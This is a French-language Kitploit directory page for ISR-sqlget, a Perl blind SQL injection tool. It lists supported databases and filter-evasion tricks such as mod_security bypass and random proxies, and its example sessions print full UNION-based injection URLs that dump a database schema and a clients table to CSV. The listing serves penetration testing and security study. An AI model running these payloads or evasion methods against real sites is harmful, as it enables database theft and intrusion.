Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
isr-sqlget — ISR-sqlget C'est un outil d'injection SQL aveugle développé en Perl. | Kitploit
Outils/GitHubGitHub/infobyte/isr-sqlget
Analyse des VulnérabilitésExploitation d'Applications WebTests d'IntrusionSécurité des Bases de Données
GitHubinfobyte/isr-sqlget

isr-sqlget

ISR-sqlget C'est un outil d'injection SQL aveugle développé en Perl.

Voir le dépôt
141413il y a 13 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

-- ISR - Infobyte Security Research -- | ISR-sqlget | www.infobytesec.com |

..:: DESCRIPTION

ISR-sqlget : c'est un outil d'injection SQL aveugle développé en Perl. Il vous permet d'obtenir les schémas de bases de données et les lignes de tables. En utilisant un seul GET/POST, vous pouvez accéder discrètement à la structure de la base de données et, avec un seul GET/POST, vous pouvez extraire chaque ligne de table vers un fichier de type CSV.

Bases de données prises en charge :

- IBM DB2
- Microsoft SQL Server
- Oracle
- Postgres
- Mysql
- IBM Informix
- Sybase
- Hsqldb (www.hsqldb.org)
- Mimer (www.mimer.com)
- Pervasive (www.pervasive.com)
- Virtuoso (virtuoso.openlinksw.com)
- SQLite
- Interbase/Yaffil/Firebird (Borland)
- H2 (http://www.h2database.com)
- Mckoi (http://mckoi.com/database/)
- Ingres (http://www.ingres.com)
- MonetDB (http://www.monetdb.nl)
- MaxDB (www.mysql.com/products/maxdb/)
- ThinkSQL (http://www.thinksql.co.uk/)    
- SQLBase (http://www.unify.com)

Fonctionnalités d'évasion :

- Encodage Unicode pleine largeur/demi-largeur (Full-width/Half-width)
- Contournement du CR non standard d'Apache
- Contournement de mod_security
- Transformation aléatoire des requêtes en majuscules
- PHP Magicquotes : encoder chaque chaîne à l'aide de la fonction CHR de la base de données ou similaire.
- Convertir les requêtes en valeurs hexadécimales
- Éviter le remplacement des espaces par /**/ ou une tabulation (\t)
- Éviter la concaténation avec || ou + en utilisant la fonction concat de la base de données ou similaire.
- User-agent aléatoire
- Serveur proxy aléatoire
- Délai aléatoire entre les requêtes

Fonctionnalités courantes :

- Liste noire de téléchargement des schémas de bases de données
- Prise en charge des cookies sous forme de tableau
- Prise en charge de SSL
- Prise en charge de serveur proxy
- Informations de la base de données extraites au format CSV

Reporting :

- Représentation graphique de la structure de la base de données pour créer des rapports de direction percutants
nécessite la bibliothèque Graphviz (http://www.graphviz.org/)

..:: UTILISATION

L'outil a besoin des informations suivantes :

  • : Action à réaliser ?
  • : Où ?

Les ACTIONS possibles sont :

D'abord :
1. Obtenir le schéma de la base de données.

Ensuite :
2.a Obtenir les lignes des tables (format csv).
2.b Obtenir le schéma graphique de la base de données.

..::Exemple :

Cible : http://target.infobytesec.com/helloworld.php?id=

Source de helloworld.php :

"; while ($tr = $database->fetch_row()) { print ""; print $tr['name']; print ""; } print ""; ?>

Lisez l'exemple de session (fichier de configuration) : ./helloworld.pm

Obtenir le schéma de la base de données :

; bash# ./ISR-sqlget.pl -s -n helloworld ; -------------------------------------------------- ; Action: Get dbschema, Session name: helloworld ; -------------------------------------------------- ; ; http://target.infobytesec.com/helloworld.php?id=,id=1 union select 1,COALESCE((select nspname from pg_namespace ; where a.relnamespace =pg_namespace.oid),'0'::text)||'[]'||COALESCE(relname,'0'::text)||'[]'||COALESCE(attname,'0'::text); ; ||'[__]'||COALESCE((select typname from pg_type where oid=b.atttypid),'0'::text) from (pg_attribute b JOIN pg_class a ON ; (a.oid = b.attrelid)) where (attnum > 0 and ((a.relkind = 'r'::"char") OR (a.relkind = 's'::"char"))) --' ; from sqlite_master where type='table' --,GET ; ; bash#

Cela génère un fichier de schéma local dans : ./template/helloworld.dbschema

Ensuite, obtenez les lignes des tables :

; bash# ./ISR-sqlget.pl -d -n helloworld ;-------------------------------------------------- ;Action: Get DBDATA, Session name: helloworld ;-------------------------------------------------- ;-------------------------------------------------- ;Action: Get DBDATA, Session name: helloworld, DbSchema: helloworld.dbschema ;-------------------------------------------------- ;------------------------------------------------------------------------------------------------------------------------------------------------------ ;http://target.infobyte.com.ar/helloworld.php?id=,id=1 union all select id||'[]'||name||'[]'||address from ;company.clients --,GET ;Save source table: ./datos/helloworld.company.clients.sql.html ;Save csv table: ./datos/helloworld.company.clients.csv ;------------------------------------------------------------------------------------------------------------------------------ ;.....

Dans le répertoire "./datos/", vous aurez deux fichiers par table comme suit :

[sessionname].[database].[table].sql.html # source html [sessionname].[database].[table].csv # valeurs séparées par des virgules

Notez que "./datos" peut être spécifié avec le paramètre $conf::outputdb dans le fichier de configuration de session.

..:: Avancé

L'outil n'utilise qu'un seul type de colonne text/varchar/etc dans la requête SQL SELECT. En utilisant des clauses UNION, vous pouvez obtenir « dans cette colonne » tout le schéma de la base de données en utilisant « [__] » comme délimiteur.

Lorsque vous avez déjà enregistré le schéma local de la base de données, vous pourrez :

1.a Obtenir les lignes des tables : En utilisant la même technique, vous pouvez obtenir toutes les lignes de chaque table de la base de données, les colonnes dont les types de données ne sont pas compatibles avec le type text sont transformées en type text à l'aide des fonctions propres à la base de données.

1.b Obtenir le schéma graphique de la base de données.

L'outil utilise, pour chaque action, un fichier de configuration de session. Ce fichier de configuration définit les paramètres nécessaires pour exploiter l'injection SQL. Le paramètre @conf::path spécifie la manière dont le HTML brut est analysé pour fonctionner avec l'outil.

Détails de l'aide :

Usage: ./ISR-sqlget.pl [ACTION] [OPTIONS]

Action: -c: Check parser module -t: Get test page -a: Get all database names (only mssql) -s: Get database/s structure/s -d: Get database/s information/s (csv format) -g: Graphic structure of database (gif format)

Options: -n: Session name -p: (Use with -c action, specify src page to check the module); Default ./template/$SESSION.testpage -v: Verbose -h: Help

-t: En utilisant le fichier de session, vous obtenez une courte table système de données à utiliser avec l'action « -c » pour analyser le HTML brut plus tard.

-c: Par défaut, il utilise ./template/[session-name].testpage. Il est utilisé pour développer et tester l'analyseur de HTML brut. Vous pouvez choisir un autre fichier HTML avec l'option « -p ».

-a: Tous les moteurs de base de données utilisent l'ordre suivant pour obtenir les lignes des tables : 1. « -s » obtenir la structure (il enregistre le schéma de la base de données dans un fichier local). 2. « -d » obtenir les données des tables.

En raison des tables système MSSQL, nous devons ajouter une étape préalable :
1. « -a » obtenir tous les noms de bases de données de /schema/catalog (il enregistre les noms dans un fichier local).
2. « -s » obtenir la structure (il enregistre le schéma de la base de données dans un fichier local).
3. « -d » obtenir les données des tables.

-s: obtenir la structure (il enregistre le schéma de la base de données dans un fichier local). -d: obtenir les données des tables.

Télécharger l’outil